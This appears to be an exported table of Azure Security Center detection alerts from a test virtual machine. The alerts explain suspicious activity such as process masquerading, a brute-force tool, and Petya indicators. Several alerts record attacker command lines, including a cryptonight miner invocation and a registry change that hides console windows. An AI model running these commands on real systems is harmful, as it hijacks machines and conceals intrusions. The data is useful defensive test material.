""HostName"": ""msticalertswin1"",
""AzureID"": ""/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1"",
""OMSAgentID"": ""46fe7078-61bb-4bed-9430-7ac01d91c273"",
""Type"": ""host""
},
{
""$id"": ""3"",
""Name"": ""msticadmin"",
""NTDomain"": ""msticalertswin1"",
""Host"": {
""$ref"": ""2""
},
""IsDomainJoined"": false,
""Type"": ""account""
},
{
""$id"": ""4"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:10.7074046Z"",
""EndTimeUtc"": ""2019-01-15T17:15:10.7074046Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""2""
},
""Account"": {
""$ref"": ""3""
}
},
{
""$id"": ""5"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""suchost.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""CommandLine"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""ImageFile"": {
""$ref"": ""5""
},
""Account"": {
""$ref"": ""3""
},
""Host"": {
""$ref"": ""2""
},
""Type"": ""process""
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:17,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
175,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:13,2019-01-15 17:15:13,7e169933-4275-4b94-b37f-490417bcfc98,2518547282863799328_7e169933-4275-4b94-b37f-490417bcfc98,Detection,Microsoft,Suspicious system process executed,Suspicious system process executed,Suspicious system process executed,The system process c:\windows\fonts\csrss.exe was observed running in an abnormal context. Malware often uses this process name to masquerade its malicious activity.,Medium,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\fonts\\csrss.exe"",
""command line"": ""c:\\windows\\fonts\\csrss.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0xcac"",
""account logon id"": ""0x1bd592e"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x12bc"",
""System Process"": ""CSRSS.EXE"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xcac"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:13.6200671Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:13.6200671Z"",
""EndTimeUtc"": ""2019-01-15T17:15:13.6200671Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:19,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
176,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:13,2019-01-15 17:15:13,9895a5cc-6f49-45f5-a0eb-f05c1f11f264,2518547282865194453_9895a5cc-6f49-45f5-a0eb-f05c1f11f264,Detection,Microsoft,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,"Analysis of host data on MSTICALERTSWIN1 detected an attempted WindowPosition registry configuration change that could be indicative of hiding application windows in non-visible sections of the desktop. This could be legitimate activity, or an indication of a compromised machine: this type of activity has been previously associated with known adware (or unwanted software) such as Win32/OneSystemCare and Win32/SystemHealer and malware such as Win32/Creprote. When the WindowPosition value is set to 201329664 (Hex: 0x0c000c00, corresponding to X-axis=0c00 and Y-axis=0c00), this places the console app's window in a non-visible section of the user's screen in an area that is hidden from view below the visible start menu/taskbar. Known suspect hex values include, but are not limited to, c000c000",Low,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\reg.exe"",
""Suspicious Command Line"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x2f8"",
""Hex Value set for WindowPosition"": ""200007c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x2f8"",
""CommandLine"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:13.4805546Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""Hive"": ""HKEY_CURRENT_USER"",
""Key"": ""console"",
""Type"": ""registry-key""
},
{
""$id"": ""11"",
""Key"": {
""$ref"": ""10""
},
""ValueType"": ""Unknown"",
""Type"": ""registry-value""
},
{
""$id"": ""12"",
""Key"": {
""$ref"": ""10""
},
""Name"": ""windowposition"",
""Value"": ""System.Byte[]"",
""ValueType"": ""DWord"",
""Type"": ""registry-value""
},
{
""$id"": ""13"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:13.4805546Z"",
""EndTimeUtc"": ""2019-01-15T17:15:13.4805546Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:19,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
177,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:13,2019-01-15 17:15:13,84ea8dcd-9436-4b4d-82b2-36114028bd61,2518547282863799328_84ea8dcd-9436-4b4d-82b2-36114028bd61,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\windows\\fonts\\csrss.exe"",
""Suspicious Command Line"": ""c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xcac"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xcac"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:13.6200671Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:13.6200671Z"",
""EndTimeUtc"": ""2019-01-15T17:15:13.6200671Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:19,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
178,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:14,2019-01-15 17:15:14,58851b10-8f5c-48f1-aade-b1529f4e2c7f,2518547282858353938_58851b10-8f5c-48f1-aade-b1529f4e2c7f,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\regsvr32.exe"",
""Suspicious Command Line"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x14f0"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""regsvr32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x14f0"",
""CommandLine"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:14.1646061Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:14.1646061Z"",
""EndTimeUtc"": ""2019-01-15T17:15:14.1646061Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:19,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
179,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:14,2019-01-15 17:15:14,7f983018-fd59-4e9e-ba70-295f6beb0e9c,2518547282850984831_7f983018-fd59-4e9e-ba70-295f6beb0e9c,Detection,Microsoft,Detected anomalous mix of upper and lower case characters in command-line,Detected anomalous mix of upper and lower case characters in command-line,Detected anomalous mix of upper and lower case characters in command-line,"Analysis of host data on MSTICALERTSWIN1 detected a command-line with anomalous mix of upper and lower case characters. This kind of pattern, while possibly benign, is also typical of attackers trying to hide from case-sensitive or hash-based rule matching when performing administrative tasks on a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\rundll32.exe"",
""Suspicious Command Line"": "".\\rundll32 /c shell32control_randll.dll"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x172c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""rundll32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x172c"",
""CommandLine"": "".\\rundll32 /c shell32control_randll.dll"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:14.9015168Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:14.9015168Z"",
""EndTimeUtc"": ""2019-01-15T17:15:14.9015168Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:19,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
180,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:15,2019-01-15 17:15:15,c7318da8-368f-47f8-bff5-e15600a3fb80,2518547282845656644_c7318da8-368f-47f8-bff5-e15600a3fb80,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,Machine logs indicate that the suspicious process: 'c:\diagnostics\usertmp\dubrute.exe' was running on the machine; this process is associated with carrying out brute force attacks. An attacker may have compromised this host as a launchpad for carrying out further attacks.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\dubrute.exe"",
""Suspicious Command Line"": "".\\dubrute.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1bbc"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""dubrute.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1bbc"",
""CommandLine"": "".\\dubrute.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:15.4343355Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:15.4343355Z"",
""EndTimeUtc"": ""2019-01-15T17:15:15.4343355Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:19,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
181,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:18,2019-01-15 17:15:18,a7e8e8c1-4561-48ea-bf75-a22c7bfc2257,2518547282813841329_a7e8e8c1-4561-48ea-bf75-a22c7bfc2257,Detection,Microsoft,Rare SVCHOST service group executed,Rare SVCHOST service group executed,Rare SVCHOST service group executed,The system process SVCHOST was observed running a rare service group. Malware often use SVCHOST to masquerade its malicious activity.,Informational,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\system32\\svchost.exe"",
""command line"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1920"",
""account logon id"": ""0x1bd592e"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x12bc"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=igCs0cA7B2rarN4kGRqCl473qJZoP8z6s8skpsDaBS0%3D&spr=https&st=2019-01-15T11:43:53Z&se=2019-04-15T11:58:53Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=a59677a1-917d-436c-8ede-6cc8220c9a45\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1920"",
""CommandLine"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:18.615867Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:18.615867Z"",
""EndTimeUtc"": ""2019-01-15T17:15:18.615867Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:23,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
182,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:18,2019-01-15 17:15:18,12ae1e22-347e-454c-ae0d-ebb48cdf189b,2518547282812706885_12ae1e22-347e-454c-ae0d-ebb48cdf189b,Detection,Microsoft,Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),This is a test alert generated by Azure Security Center. No further action is needed.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\asc_alerttest_662jfi039n.exe"",
""Suspicious Command Line"": ""asc_alerttest_662jfi039n.exe -foo"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1a6c"",
""Arguments Auditing Enabled"": ""true"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""asc_alerttest_662jfi039n.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1a6c"",
""CommandLine"": ""asc_alerttest_662jfi039n.exe -foo"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:18.7293114Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:18.7293114Z"",
""EndTimeUtc"": ""2019-01-15T17:15:18.7293114Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:23,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
183,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:19,2019-01-15 17:15:19,c76cdb6c-cea0-4b2b-9ab6-1442a5857ed8,2518547282803821916_c76cdb6c-cea0-4b2b-9ab6-1442a5857ed8,Detection,Microsoft,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Analysis of host data on MSTICALERTSWIN1 detected indicators associated with Petya ransomware. See https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/ for more information. Review the commandline associated in this alert and escalate this alert to your security team.,High,False,"{
